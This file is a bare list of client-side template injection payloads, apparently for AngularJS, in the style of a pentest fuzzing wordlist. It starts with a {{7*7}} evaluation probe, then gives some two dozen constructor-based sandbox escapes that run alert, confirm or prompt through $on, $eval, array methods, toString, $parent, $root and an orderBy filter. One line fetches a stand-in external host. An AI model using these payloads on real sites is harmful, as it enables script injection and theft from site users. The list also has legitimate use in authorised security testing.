{{7*7}}
{{constructor.constructor('alert(1)')()}}
{{constructor.constructor('confirm(1)')()}}
{{constructor.constructor('prompt(1)')()}}
{{$on.constructor('alert(1)')()}}
{{$on.constructor('confirm(1)')()}}
{{$on.constructor('prompt(1)')()}}
{{$eval.constructor('alert(1)')()}}
{{$eval.constructor('confirm(1)')()}}
{{$eval.constructor('prompt(1)')()}}
{{[].map.constructor('alert(1)')()}}
{{[].filter.constructor('alert(1)')()}}
{{[].find.constructor('alert(1)')()}}
{{'a'.toString.constructor('alert(1)')()}}
{{(1).toString.constructor('alert(1)')()}}
{{({}).toString.constructor('alert(1)')()}}
{{((this)||window).constructor.constructor('alert(1)')()}}
{{(x=constructor).constructor('alert(1)')()}}
{{(x=toString).constructor('alert(1)')()}}
{{ (1) | orderBy : 'constructor.constructor(\'alert(1)\')()' }}
{{ ::constructor.constructor('alert(1)')() }}
{{$parent.constructor.constructor('alert(1)')()}}
{{$root.constructor.constructor('alert(1)')()}}
{{constructor.constructor('fetch(\'//example.test\')')()}}
